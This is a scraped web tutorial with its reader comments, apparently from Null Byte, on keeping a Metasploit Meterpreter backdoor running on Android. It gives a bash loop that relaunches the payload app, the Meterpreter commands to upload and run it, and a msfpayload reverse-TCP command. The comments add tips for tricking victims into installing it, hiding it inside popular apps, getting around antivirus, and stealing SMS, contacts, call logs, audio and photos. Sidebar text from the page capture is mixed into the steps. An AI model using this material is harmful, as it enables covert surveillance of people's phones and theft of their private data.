Академический Документы
Профессиональный Документы
Культура Документы
FOLLOW US
HOW TO
In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.
I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable,
thanks to the raw syntaxes I found out from other sites.
Step 1
After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...
Step 2
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 1/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)
--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)
Step 3
cd /
Now you should be in the ROOT directory, you can check by typing:
ls
Now type:
cd etc
ls
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 2/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
HOW TO
HOT LATEST
HOW TO
HOW TO
HOW TO
Never-Mind:
HOW TO HACK WI-FI
Install KalicdLive
/ on a USB Drive (With
cd /sdcard/Download
Persistence, Optional)
ls
upload anything.sh
E X P LO I T D E V E LO P M E N T
ALL FEATURES
HOW TO
OS S
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 3/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
Easily Bypass macOS High Sierra's Login
Screen & Get Root (No Password Hacking
Required)
FOLLOW US
HowDone!
to GetUploaded!
Your Mac Ready for Hacking
HOW TO HACK WI-FI
HOW TO
Now, navigate to the location of the script:
Buy the Best Wireless Network Adapter for
Wi-Fi Hacking in 2017
HOW TO cd /
Create ancd
Evil/sdcard/Download
Access Point with MitmAP
ls
THE HACKS OF MR. ROBOT
HowNow
to Use
itsthe Shodan
time API with Python
for EXECUTION. to
Type:
Automate Scans for Vulnerable Devices
sh anything.sh
VIDEO
HOT LATEST
HOW TO
The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
HOW TO
HOW TO
HowPROOF:
to Crack Online Web Form Passwords
with THC-Hydra & Burp Suite
E X P LO I T D E V E LO P M E N T
Wow! It happened so Fast that 3 sessions got opened one after another.
How to Learn Binary Exploitation with
Protostar
(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical
HOW TO
problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )
Hack Windows 7 (Become Admin)
The END:
ALL FEATURES
Yes! Finally a persistent backdoor has been created successfully for Android systems.
HOW TO
OS S
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 4/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
Easily Bypass macOS High Sierra's Login
Things
Screen to Remember:
& Get Root (No Password Hacking
Required)
FOLLOW US
The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
If the Victim's Android system is Rooted and your Public IP is Static, then:
Thank You,
HOW TO
HOW TO
HowThis is so Passwords,
to Crack easy do deploy
Part with a little bit of Social Engineering, I gotta try this out.
1 (Principles
& Technologies)
I see you've been researching a lot to publish this, good job.
REPLY
F.E.A.R.
2 YEARS AGO 2
REPLY
ANDREW VIGIL
6 MONTHS AGO -1 HIDDEN
SUDHARSAN VISWA
2 YEARS AGO 1
Great post F.E.A.R. Is there a way I can embed the meterpreter back door in to an apk file (game,launcher,,etc) ???
REPLY
F.E.A.R.
2 YEARS AGO 2
While creating a payload, what we do is embed a trojan/meterpreter in an apk file, which is then known as backdoor/trapdoor.
In other words, it is already embedded into the apk file, while the time of creation.
REPLY
SUDHARSAN VISWA
2 YEARS AGO 2
Thank you for your response F.E.A.R. When the victim download's the app, the app seems useless and the victim uninstall the app.
If I can embed the backdoor in to a game or some other app, the backdoor will not be deleted. is there a way to embed the backdoor ?
REPLY
WONDERHOWTO 2
F.E.A.R.
YEARS
GADGETAGO
HACKS NEXT REALITY NULL BYTE 2
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 5/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
I don't think there is an easy way out for that, if you understand complicated ways follow this FOLLOW US
Even if you do embed the code, you cannot make it persistent, because with the backdoor embedded, both, the app and the code will launch on the Android System
consistently.
Else, just try to convince the victim, that the app is meant to boost his Android, and it works in background. Show him/her the proof with a fake RAM scanner or a
normal RAM scanner application. (both would work)
REPLY
RAPID
1 YEAR AGO 1
did you find anyway of doing this? making it persistent on a original app?
REPLY
MISTER INVISIBLE
10 MONTHS AGO - EDITED 10 MONTHS AGO 1
Here: https://github.com/dana-at-cp/backdoor-apk/
https://github.com/dana-at-cp/backdoor-apk/
Exactly what you wanted, but as F.E.A.R says, whit persistence the app will open automatically and that wouldn't be stealthy. Although if you backdoor a popular app
like whatsapp and makw the victim install it, they will use it without sensing the diference while you get your backdoor. ;)
REPLY
MARK MATSON
2 YEARS AGO 1
Dude thanks for this how to, but i have a problem with the script, when i execute the script remotely, its works, but send me many sessions of meterpreter, is so many
than i can't work is like an overflow of sessions. Do you know what happened? And thanks again for your work!
REPLY
F.E.A.R.
2 YEARS AGO 2
Welcome! Mark,
Yes I know that there is an overflow of sessions even after terminating the shell, however the overflow should end when you get the meterpreter prompt. Maybe the
sleep command doesn't work, or try changing that to 2000 because the units maybe in milliseconds.
REPLY
F.E.A.R.
2 YEARS AGO 2
REPLY
MARK MATSON
2 YEARS AGO 1
Thanks dude!! i'll try. And last thing when i created the payload i have to put the LPORT line because, is wasn't work for me.
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
MARK MATSON
2 YEARS AGO - EDITED 2 YEARS AGO 1
My mistake, now is working fine!!!! y put all this commands in a single line.
Now is fixed....
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done
Thanks for your amazing job! Really i enjoy your how to!!
REPLY
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 6/33
12/5/2017
F.E.A.R.
How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
1
2 YEARS AGO FOLLOW US
Yes I know that, I already updated the script.
And You are Welcome! Mark (actually thanks to you!)
REPLY
CRACKER|HACKER
2 YEARS AGO 1
Absolutely amazing! Well done! It's always more fun to write your own scripts. I can't wait fore more of your tutorials!
Just a suggestion: I wouldn't recommend putting your public IP out there, unless it is spoofed or hidden behind an anonymity service.
REPLY
F.E.A.R.
2 YEARS AGO 1
My Public IP is neither spoofed nor behind an anonymity service, however its dynamic and my firewall has all ports closed, plus it tells me about any network
information which is received or sent by my System. (custom firewall)
And that's why I have to turn all of my Firewalls off while I hack.(except router's of-course)
Still, I appreciate the suggestion.
REPLY
BACK DOOR
2 YEARS AGO 1
REPLY
F.E.A.R.
2 YEARS AGO 1
Hi again Back,
Yes, you can (those are not my words, because I haven't tried it yet.)
But I am confident it will work!
There is a slight change in making the payload:
REPLY
BACK DOOR
2 YEARS AGO 1
REPLY
F.E.A.R.
2 YEARS AGO 1
Darn it!
Sorry back, I tried, it only works on Windows,
REPLY
RAFAEL OLIVEIRA
1 YEAR AGO 1
How i use this in windows? Someone knows? I need to use this in NO-IP, but in kali isnt working.
REPLY
SAM DARKZZ
1 YEAR AGO 1
REPLY
H3X H3X
2 YEARS AGO 1
Can i download the pictures on the android phone using kali ? i mean get the pictures on that andoid user . is it possible ?
REPLY
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 7/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
F.E.A.R.
2 YEARS AGO FOLLOW US 1
Of-course!
Use download command
REPLY
ZERBERO KHAN
2 YEARS AGO 1
Hi, first thank you for this. I'm having trouble with the script, it keeps me seding the message: Error: Uknown option: --user. What could be? I already try without the "--
user 0" option and it runs but does not do what have to do. Does this have to deal with the Android version? Any help would be appreciated.
REPLY
F.E.A.R.
2 YEARS AGO 1
Hi and Welcome,
Really sorry about the (very) late reply, I actually missed this comment.
This is just an internal error, script is not wrong, tested on the Latest Android Version (5.0.2)
Reboot the android, or try it on another one.
REPLY
JOSHUA DONCOUSE
2 YEARS AGO 1
Wait though can't we make a autorunscript that after it connects to the phone it runs cd /
cd sdcard
cd DCIM
upload persistant.sh
shell
cd /
cd /sdcard/DCIM
ls
sh persistant.sh
in that order? just a thought.
REPLY
CRACKER|HACKER
2 YEARS AGO - EDITED 2 YEARS AGO 1
Yes, you can. Just remember that if you are in a Meterpreter prompt, you will need to run the relative Meterpreter commands first.
REPLY
F.E.A.R.
2 YEARS AGO - EDITED 2 YEARS AGO 2
I actually tried it, on the day I posted this, but same thing happened in my comment below.
So I told him to try it out first.
But then I found a mistake too, I made the script to run as soon as the session starts. (And this resulted in overflow, unknown cmds, etc)
But your method seems fine, I though he needed a fully automatic. script.
My mistake.
EDIT: Thank You C|H
REPLY
CT9
6 MONTHS AGO 1
Hi, I managed to creat the autorunscript but can't get it to work completely:
to reate it just edit a autorun.rc file in root folder of kali and enter your commands there (one per line) then in msf console run :
However putting the commands you mentionned like this won't work because it will not run sh persistent.sh inside the shell, what happens is that it uploads the sh
file successfully, then open the shell, and run "sh persistent.sh" in background inside the meterpreter terminal and not the android shell, and I don't know how to fix
this.
We need to put some command inside the autorunscript to start the shell with a specific command (sh /sdcard/persistent.sh) but no idea how
REPLY
F.E.A.R.
2 YEARS AGO 1
Good Idea!
But, I think first try it, because maybe, meterpreter may not be able to handle so many commands, so fast, and it will result in unknown command error, so it's better
to execute it step by step,
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 8/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
{As I said, maybe, that doesn't mean you shouldn't try it.}
FOLLOW US REPLY
JOSHUA DONCOUSE
2 YEARS AGO 1
ok can anyone make an autorunscript file that does this? I can make say run autorunscript <scriptname> and it just stays there. pretty much here's what it does after i
connect the metpreter
REPLY
A.M
2 YEARS AGO 1
I was just wondering about what would happen if two or more users installed&opened the apk !
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
A.M
2 YEARS AGO 1
Sorry for the late reply as I was busy with somethings ^^'
I'd like to know the command to 'swap' between devices please & also wanted to know if there's a problem that might occur when the (.sh file) is put more than once
on the same device... for example:
REPLY
CRACKER|HACKER
2 YEARS AGO 1
If you are currently in a Meterpreter session, type background. Once you are back in the Metasploit command line, type sessions -i to view the sessions, and choose
by the session number, i.e. sessions -i 2.
REPLY
A.M
2 YEARS AGO 1
Thanks, Cracker|Hacker
" Error running command shell: Errno::EADDRNOTAVAIL Cannot assign requested address - bind(2) for "127.0.0.1" port 0 "
Any idea on how to fix it ?
REPLY
F.E.A.R.
2 YEARS AGO 1
Ans2: No there is no problem at all (your device should have root access to access the 'root area')
Ans3: Hm.. This error should not occur at this stage... "Address not available", the port is in use. Try changing the port and then exploit.
REPLY
A.M
2 YEARS AGO 1
REPLY
WONDERHOWTO
F.E.A.R.
2 YEARS
GADGET HACKSAGO
NEXT REALITY NULL BYTE 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 9/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
While creating the payload, just put this after LHOST: FOLLOW US
LPORT 8080 (or 80, or try the default one again 4444)
REPLY
A.M
2 YEARS AGO 1
REPLY
CRACKER|HACKER
2 YEARS AGO 1
REPLY
A.M
2 YEARS AGO 1
Are there any solutions that I could try to fix this issue ?!
Cuz I can't install Kali outside the VirtualBox at the moment !
& Would installing another VM help ?
REPLY
F.E.A.R.
2 YEARS AGO 1
Virtual Box?
I have never used it and never will.
Only trust VMware (12 I think) I also like way it allocates memory (RAM)
However the network settings are more complicated to configure but nevermind.
Also, I don't think this problem is because of virtual box but.. Its better to switch to VMware.
Try hacking another device, before switching.
REPLY
A.M
2 YEARS AGO 1
REPLY
HELPPPPPPPPP
by the way, great tutorials, keep up the good work! :D
REPLY
F.E.A.R.
2 YEARS AGO 1
Hi Steven,
Welcome to NullByte!
The device has to be rooted (have root access) to access that directory.
Thank You for the appreciation :)
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 1
REPLY
SHQIPERIA ETNIKE
2 YEARS AGO 1
Where I write the code msfpayload android/meterpreter/reversetcp LHOST=182.68.42.6 R > /root/abcde.apk the result is "Permission denied" how can I proced
REPLY
1
OCCUPYTHEWEB
2 YEARS AGO FOLLOW US
you must be the root user.
REPLY
SHQIPERIA ETNIKE
2 YEARS AGO 1
REPLY
CRACKER|HACKER
2 YEARS AGO 1
REPLY
OCCUPYTHEWEB
2 YEARS AGO 1
Login as root.
REPLY
PC 0MRADE
2 YEARS AGO - EDITED 2 YEARS AGO -1 HIDDEN
PC 0MRADE
2 YEARS AGO 1
Android 5.x.x have been giving out the parsing error usually associated with unchecking unchecking the allow installation from unknown sources check box. This is
causing my two most common RATS to be impossibly to install on devices. could it be that one like your self has a solution.
REPLY
JESSICA THOMSON
2 YEARS AGO - EDITED 2 YEARS AGO 1
REPLY
CHAITANYAKUMAR G
2 YEARS AGO 1
Hi, I just copied your bash script, in my rooted android 5.0.2 phone and when i execute it, it says, while unmatched. I tried addding ; after while and it gives different
error. Can someone please help ?
Chaitanya.
REPLY
F.E.A.R.
2 YEARS AGO - EDITED 2 YEARS AGO 1
REPLY
CHAITANYAKUMAR G
2 YEARS AGO - EDITED 2 YEARS AGO 1
Ii just tried with the am command line only then there is different message.. moreover i think with android 5, i am able to connect to the android device(non rooted),
but not able to execute any reboot or shutdown commands. It should say access/permission denied, but it says unknown command. :(
REPLY
0XYG3N
2 YEARS AGO - EDITED 2 YEARS AGO 1
hello ,
i've done exactly what you said.. its working i have meterpreter shell .. but its like restricted access.. i cant go to /system/etc/init.d or even upload the .sh file to
/sdcard/Download directory.. this is the error i get.
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 11/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
REPLY
FOLLOW US
DONGWON LEE
2 YEARS AGO - EDITED 2 YEARS AGO 1
-info-
cell phone is LG Gpro2 and android version 4.4.2
this is error message " There is a problem parsing the package"
REPLY
0XYG3N
2 YEARS AGO -1 HIDDEN
DONGWON LEE
2 YEARS AGO - EDITED 2 YEARS AGO 1
REPLY
JESSICA THOMSON
2 YEARS AGO 2
REPLY
ITS HITMAN
2 YEARS AGO - EDITED 2 YEARS AGO 1
hi there.!
how can i find the public ip of the android device connected to wifi, and i have no access to that device.
pls help me out.
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
ITS HITMAN
2 YEARS AGO 1
i don't have any access to that android device, at that instance how can i?
REPLY
HARSHA
2 YEARS AGO 1
if target user has dynamic IP above method won't work.so any other way for dynamic ips?
REPLY
KAMRAN BALOCH
2 YEARS AGO 1
I need Help :( . when sends the file to cell . file can't open after downloading (Sorry bad in English) help me please Thanks
REPLY
ASCHI33
2 YEARS AGO 1
Hi,
I can perfectly navigate on the android filesystem, download images and stuff is also possible.
Is there a solution?
REPLY
F.E.A.R.
2 YEARS AGO 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 12/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
REPLY
FOLLOW US
ASCHI33
2 YEARS AGO 1
Thanks for the quick answer, sadly this produces the same error.
REPLY
F.E.A.R.
2 YEARS AGO 1
Recheck:
1) You have placed the script in the root folder of Kali
2) You have used the correct command:
3) upload xxx.sh
I this doesn't work then, it means your android is strict in security matters and hence you either have to root your android or try it on another one.
REPLY
B7ITZZ
2 YEARS AGO 2
The exploit doesn't seem to start up unless the user selects the MainActivity App again. Is there a way to run the app continuously in the background? I've tried the
suggested persistent back door but no luck.
REPLY
TRYHARDER
2 YEARS AGO 1
REPLY
TRYHARDER
2 YEARS AGO 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 13/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
ENERGYWOLF
2 YEARS AGO - EDITED 2 YEARS AGO 1
@tryharder I had the same problem. I solved it by manually signing the apk. This may work for you. Look at this link for how to sign the app manually
https://developer.android.com/tools/publishing/app-signing.html#signing-manually
This step may not be necessary, but it's how I did it. So in case signing it doesn't work for you maybe try that last step too.
REPLY
CASPERASS
2 YEARS AGO 1
Thank you so much F.E.A.R. I have a question: How can we make it persistent decompiling it with apktool? What do we need to add to AndroidManifes.xml or smali?
Most of the victims' phone probably won't be rooted. So after reboot our malicious apk will be useless. If we add required lines to the source can we make it persistent
permanently?
REPLY
ZACHARIAH HAZELWOOD
2 YEARS AGO 1
Hey do you know if there is a command in meterpreter for android or a way to browse the sys files to get make and model of phone so i can change root
REPLY
A.M
2 YEARS AGO 1
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
A.M
2 YEARS AGO 1
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
ARMAN BA
2 YEARS AGO 1
hi there !
i upload script on 2 device,one device was root but another not rooted.
but when i run script on both of them i get this error >>
: not found6: true
where is the problem?
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 14/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
REPLY
FOLLOW US
F.E.A.R.
2 YEARS AGO 1
Yes I know,
Have been working on it for 3 weeks!
Found a solution, updating script...
REPLY
ARMAN BA
2 YEARS AGO - EDITED 2 YEARS AGO 1
thanks F.E.A.R
i found a solution and it's work for me.i write and explain exactly what i do.when i copy and paste your script in notpad it dos not working for me but when i write like
this it's work.
1.in kali linux open terminal and write >> nano anything.sh << and than hit Enter key on keyboard.(this make a new .sh file)
2.on this windows you must write your script code or copy and past it.but i think it's better to writing the code
3.for saving this script you must hit Ctrl+x key together on your keyboard and than hit Y key and after that hit Enter key (it's don your file is saved)
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
ANDRU SERBAN
2 YEARS AGO - EDITED 2 YEARS AGO 1
Hello people , wich version of kaly you use ? Who is the last one with msfpayload ? and working ..?
FEAR , please tell me wich is the last tutorial avalible for reversetcp on android ? only one sesion ...to download some files...
REPLY
F.E.A.R.
2 YEARS AGO 2
REPLY
PINKYFIRE
2 YEARS AGO 1
Hello F.E.A.R
first i wanna thanks for all of ur great tut :)
i've got so many question,
1.are the LPORT is important ?? i dont see u typin' it when u make the backdoor.apk
2.Since we know our target android phone is not rooted,are we have to place the shell script in the download folder ??
3.can this method works in iphone ??
4.im already make my own payload.apk.on my rooted android its not work :( but work at my other android.what happen with that ??
5.after i set my listener,and launch the Main Activity app on my other android (not rooted),the meterpreter start working,which makes me happy for a while,i take some
pic to try it with (webcamsnap) command,its work as well,and then about 10 minutes later ,my meterpreter wont work with reason : Died.what happen ??
Sorry for too much question,and sorry for my bad english because english not my main languange :"(
Hope u reply all of my question
Thanks
REPLY
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 15/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
F.E.A.R.
2 YEARS AGO
FOLLOW US
2
1. My default LPORT is 4444 so there is no need to change it, until you are 'experimenting' over WAN, and have forwarded port other than 4444.
2. No don't do that, instead place it in a folder which is rarely explored or looked into. I did it as it is easily accessible from that folder.
4. Is the other phone in which the hack doesn't work is Mi ? It doesn't depend whether the android is rooted or not but it might depend on some systems.
5. Android meterpreter is very unstable, if you are getting 10min, you are really lucky. That is the reason why I made this persistence tutorial.
Follow it and you can have access to the android forever (provided the android doesn't reboot and you are on LAN)
REPLY
PINKYFIRE
2 YEARS AGO 1
im just want to say my rooted android phone use some cyanogen-rom i downloaded from the internet,maybe that makes me cant install the generated apk :/
1.the phone i try to hack is my own phone (for experiment) and its connected to my LAN,my question is,it is possible to hack someone android that not connected to my
LAN ??
2.if im make the sh script and then launch the script,what will happen when target reboot his phone ??
3.what happen when target delete the installed apk ??
Thanks for ur help,i dont even know you but im already like you :D
thanks for helping me :)
REPLY
F.E.A.R.
2 YEARS AGO 2
Use a file manager/ explorer, navigate to the directory of the generated apk and install from there. (Make sure you have deleted the previously installed apk)
1. Yes you can test the hack on WAN (outside LAN), you need to fulfill two requirements:
a) the port (4444) used , should be forwarded (give me details about your router and I'll explain port forwarding)
b) while creating the payload you need to replace your internal IP with external/public one. (Type on Google: what's my IP)
2. If the non rooted target reboots the phone then the persistence will end. (The script will terminate)
3. If the target deletes the apk then all is lost (session will end)
REPLY
PINKYFIRE
2 YEARS AGO - EDITED 2 YEARS AGO 1
oops,my bad
REPLY
F.E.A.R.
2 YEARS AGO 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 16/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
FOLLOW US
(I am assuming that you know how to login to the router config page...)
REPLY
SAAD SAAB
2 YEARS AGO 1
hello f.e.a.r
m new in kali linux, plz help me .... when i try to upload script.sh, it shows me an error:
& can u tell me how can i get root access..? as you've written above "We need Root Access to complete this command! Darn!"
REPLY
F.E.A.R.
2 YEARS AGO 1
Hello Saad:
You don't need root access to execute the script, but to access the location you need root, so that the script is persistent even after reboot.
However if the device is not rooted, upload the script anywhere in sdcard, and follow the tutorial further. (The script will terminate after reboot :( )
REPLY
SAAD SAAB
2 YEARS AGO - EDITED 2 YEARS AGO 1
i am uploading the script in Downloads folder of android device, but the same error :( i am trying this script with galaxy s3, when i want to upload with this command
"upload script.sh" it gives me "core-channel-open: Operation failed: 1"
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
SAAD SAAB
2 YEARS AGO 1
thanks again :)
REPLY
F.E.A.R.
2 YEARS AGO - EDITED 2 YEARS AGO 1
cd /
upload script.sh
shell
cd /
sh script.sh
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 17/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
SAAD SAAB
2 YEARS AGO
FOLLOW US
2
REPLY
F.E.A.R.
2 YEARS AGO 2
Try and use the download command (to download something), if this doesn't work then the application has been surely blocked by AV.
Try to remove/delete a file using rm command.
Finally try this with another android.
REPLY
SAAD SAAB
2 YEARS AGO 1
REPLY
REPLY
PINKYFIRE
2 YEARS AGO 1
hello F.E.A.R ,my router is realtek PCIe GBE Family Controller,i dont know what my router number model,im lost the package box,even in the link u provided to me,the
only realtek model listed just 1 and thats doesnt even match with my router,any advice ??
REPLY
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 18/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
F.E.A.R.
2 YEARS AGO FOLLOW US 1
You know how to access your Router's login page right? If not then google it. Once you are in, get me a screenshot =)
REPLY
SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO 1
Though, I have some problem and hope that you have the answers for that, just learning Kali Linux and its so much fun :)
1. Even though my phone is rooted and I have checked by typing in meterpreter, checkroot . It sais Device is rooted with a green plus sign next to it, but even though
i try to upload alltid.sh in cd /etc/init.d it sais Operation failed 1.
2. So I tried the other way by uploading the file to sdcard/Download and it worked, but then when I type. sh alltid.sh (when im in shell) i get the error on the
screenshot. I have tried typing your script both in leafpad and in terminal ( nano anything.sh, then typing the scrips code) still I get that error 2 and 3.
REPLY
F.E.A.R.
2 YEARS AGO 1
1) You need to drop into shell and type su for root access. (A tutorial containing this will be published soon)
REPLY
SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO 1
1. Ohh so I write shell and then type su, then upload alltid.sh in the init.d directory? Will try that when I get home.
2. My bad, I read there is no space, damn. Im sorry.
Also if you could learn us how to port forward as you stated earlier to hack with WAN.
Thanks F. E. A. R. For the reply, will try this when I get home :-)
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
SAGATE
2 YEARS AGO 1
REPLY
F.E.A.R.
2 YEARS AGO 1
Now test the hack, if it does not work, go to the firewall option of your router's config page and get me a screenshot (OR allow the ports through firewall if you know
how to.)
REPLY
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 19/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO FOLLOW US 1
Thank you, I will try that guide and I will try the hack and let you know :)
Btw, It worked! By going into shell and typing su. I was able to type sh alltid.sh and now it works, sessions gets automatic open when I enter meterpreter.
But I still wasnt able to understand how to upload alltid.sh into cd /etc/init.d and look forward to that tutorial but I have the other method in the meantime.
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
PINKYFIRE
2 YEARS AGO 1
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
ASHWIN DEVRAJ
2 YEARS AGO 1
i have did eevry thing u said but after opening the file i have sent to device and opened and the it says prasing error (there is problem in prasing the packages) need
urgent hepl
REPLY
F.E.A.R.
2 YEARS AGO 1
Right here
REPLY
JESSICA THOMSON
2 YEARS AGO - EDITED 2 YEARS AGO 1
and than i tested it over WAN and it did work fine. problems i faced are, first 3 or 4 time session is closed in less than a minute and on next try it doesn't closed and i
had enough time to experiment with commands. can u tell why this happened at start it doesn't show commands like dump sms and other commands ? why does this
happen?_
when i record mic, it just record 1 or 2 sec audio even when i typed recordmic 1000 ? can u tell how can record audio for longer duration?
i can not dump my sms and contacts( their was an error dont know why) but i was able to dump my call log.
REPLY
F.E.A.R.
2 YEARS AGO 2
Welcome Jessica,
Android Meterpreter is still in development. (It is quite unstable)
After the meterpreter session starts, the commands (dump_sms etc.) can be used and can be displayed using help command. Anti-Virus is the only reason for this to
happen. (Specially pre-installed ones, like in Mi or Samsung) If you can somehow make the AV to 'fully trust' the application 'Main Activity' then these problems do not
occur (Tested in Mi)
No, we cannot either perform Key-logging or Migrate to other processes, these Post-Modules are for Windows.
However you can use scripts to key-log from the stock android keyboard and for migration purposes (may need root access)
Recording, (record_mic 20) is not an issue for me, try this again without signing the application. (Use it Raw)
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 20/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
Answer to the last question is same as the first one, I use only the raw .apk and there is no problem executing the commands.
FOLLOW US
Run this command and tell the result in your reply please: check_root
REPLY
JESSICA THOMSON
2 YEARS AGO 1
i am only able to dump call log but i can not dump my sms and contacts... i think some kind of timeout, may b i have lots of texts in my inbox and lots of contacts..
iam not sure :?
REPLY
F.E.A.R.
2 YEARS AGO 1
Jessica:
You can either make it to 'trust' or disable it's real time protection from settings.
For example in CM security AV application, when I disable the 'Real Time Protection' option, it' doesn't scan the malicious .apk and hence the permissions to access
microphone or camera are by default set to grant, however if the option is enabled, the AV scans the permissions of the App and resents them to Prompt or Deny.
If while dumping sms and contacts there is a time-out error then it is because of the faulty/slow connection and not any internal errors. The dumping process may take
even 20 minutes (as in my case).
Try deleting all the useless ones (spam) and then dump again. (Just for the test)
REPLY
ZI LSD
2 YEARS AGO 1
for that you have to modify the source of the original apk with Android Studio.
jpeg
explanation here
REPLY
F.E.A.R.
2 YEARS AGO 2
But actually there are many other ways to achieve this, I came to know, 3 days after publishing the guide. (Never thought of updating the guide)
REPLY
ADARSH SINGH
2 YEARS AGO 1
Hey Fear I have backdoored the Main activity apk with the original hike apk and the backdoored works great but i want persistant , and i tried your script but it gives
me this error when i execute the script from the shell.
(I am using this version of script below and when i install only the MainActivity.apk on my android(jelly bean) phone the script works.but when i installed the
backdoored apk the script dosen't work and gives me the error shown above. )
(this is the script i am using i think i need to modify something in this script to work it out)
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 21/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
